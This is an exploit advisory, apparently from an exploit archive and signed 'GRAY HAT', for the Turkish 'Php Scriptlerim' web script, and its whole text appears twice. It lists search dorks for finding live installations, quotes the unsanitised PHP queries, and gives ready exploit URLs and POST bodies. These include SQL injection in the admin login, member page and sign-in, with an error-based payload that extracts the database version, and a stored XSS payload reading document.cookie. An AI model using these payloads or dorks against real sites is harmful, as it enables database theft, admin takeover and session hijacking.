Powered by Php Scriptlerim Multi Vulnerability
Test : Kali Linux /Linux
Autor : GRAY HAT
Dorks : "Powered By : Php Scriptlerim" "İletişim : info@phpscriptlerim.com" (TR )
1.
SQL İNJ : yonetim/index.php
Panel Code : ($query = mysql_query("SELECT * FROM administrator WHERE username='$username'");
EXP : http://localhost/phpscriptlerim/yonetim/index.php
Post Code : username=admin( SQL İNJ BURAYA )&password=admin&gonder=Giri%C5%9F+Yap
2.
SQL Inj : uyedetay.php
Üye Code : mysql_query("select * from uyeler where sefurl='$url'"); $url = $_GET['url'];
EXP : http://localhost/phpscriptlerim/uyedetay.php?url=ETHİCAL( SQL İNJ BURAYA )
http://localhost/phpscriptlerim/uyedetay.php?url=ETHİCAL%27%20AND%20%28SELECT%203581%20FROM%28SELECT%20COUNT%28*%29,CONCAT%28version%28%29,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27Hvkg%27=%27Hvkg
XSS : uyebilgileri.php
if(isset($_POST['gonder'])){
$text = $_POST['text'];
$text1 = $_POST['text1'];
$password = $_POST['password'];
$parola = md5($password);
if($text==""||$text1==""){ echo '<font color="red"><b>Alanları boş geçemezsiniz.</b></font><br><br>'; }
<li class="clearfix">
<label>İkinci İsim</label>
<input type='text' name='text' value="<?php echo $bbb['text']; ?>" id='name' maxlength="55" />
<div class="clear"></div>
EXP : http://localhost/phpscriptlerim/uyebilgileri.php
XSS post : text=1"><script>alert(document.cookie)</script>&password=&text1=1"><h3>hh</h3>&gonder=Kaydet
SQL Inj : signin.php
if(isset($_POST['gonder'])){
$email = $_POST['email'];
$sifre = $_POST['sifre'];
$tarih = date('Y-m-d');
$parola = md5($sifre);
if($email==""||$sifre==""){ echo '<font color="red"><b>Bütün alanları doldurmanız gerekmektedir.</b></font><br><br>'; }else{
$xlb = mysql_query("SELECT * FROM uyeler WHERE email='$email'")
EXP : http://localhost/phpscriptlerim/signin.php
SQL Post : email=theethical@facebook.com(SQL İNJ BURAYA )&sifre=1111&security=a4f29&gonder=Giri%C5%9F
Yonetim Panel : http://localhost/phpscriptlerim/yonetim/index.php
Test : Kali Linux /Linux
Autor : GRAY HAT
Dorks : "Powered By : Php Scriptlerim" "İletişim : info@phpscriptlerim.com" (TR )
1.
SQL İNJ : yonetim/index.php
Panel Code : ($query = mysql_query("SELECT * FROM administrator WHERE username='$username'");
EXP : http://localhost/phpscriptlerim/yonetim/index.php
Post Code : username=admin( SQL İNJ BURAYA )&password=admin&gonder=Giri%C5%9F+Yap
2.
SQL Inj : uyedetay.php
Üye Code : mysql_query("select * from uyeler where sefurl='$url'"); $url = $_GET['url'];
EXP : http://localhost/phpscriptlerim/uyedetay.php?url=ETHİCAL( SQL İNJ BURAYA )
http://localhost/phpscriptlerim/uyedetay.php?url=ETHİCAL%27%20AND%20%28SELECT%203581%20FROM%28SELECT%20COUNT%28*%29,CONCAT%28version%28%29,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27Hvkg%27=%27Hvkg
XSS : uyebilgileri.php
if(isset($_POST['gonder'])){
$text = $_POST['text'];
$text1 = $_POST['text1'];
$password = $_POST['password'];
$parola = md5($password);
if($text==""||$text1==""){ echo '<font color="red"><b>Alanları boş geçemezsiniz.</b></font><br><br>'; }
<li class="clearfix">
<label>İkinci İsim</label>
<input type='text' name='text' value="<?php echo $bbb['text']; ?>" id='name' maxlength="55" />
<div class="clear"></div>
EXP : http://localhost/phpscriptlerim/uyebilgileri.php
XSS post : text=1"><script>alert(document.cookie)</script>&password=&text1=1"><h3>hh</h3>&gonder=Kaydet
SQL Inj : signin.php
if(isset($_POST['gonder'])){
$email = $_POST['email'];
$sifre = $_POST['sifre'];
$tarih = date('Y-m-d');
$parola = md5($sifre);
if($email==""||$sifre==""){ echo '<font color="red"><b>Bütün alanları doldurmanız gerekmektedir.</b></font><br><br>'; }else{
$xlb = mysql_query("SELECT * FROM uyeler WHERE email='$email'")
EXP : http://localhost/phpscriptlerim/signin.php
SQL Post : email=theethical@facebook.com(SQL İNJ BURAYA )&sifre=1111&security=a4f29&gonder=Giri%C5%9F
Yonetim Panel : http://localhost/phpscriptlerim/yonetim/index.php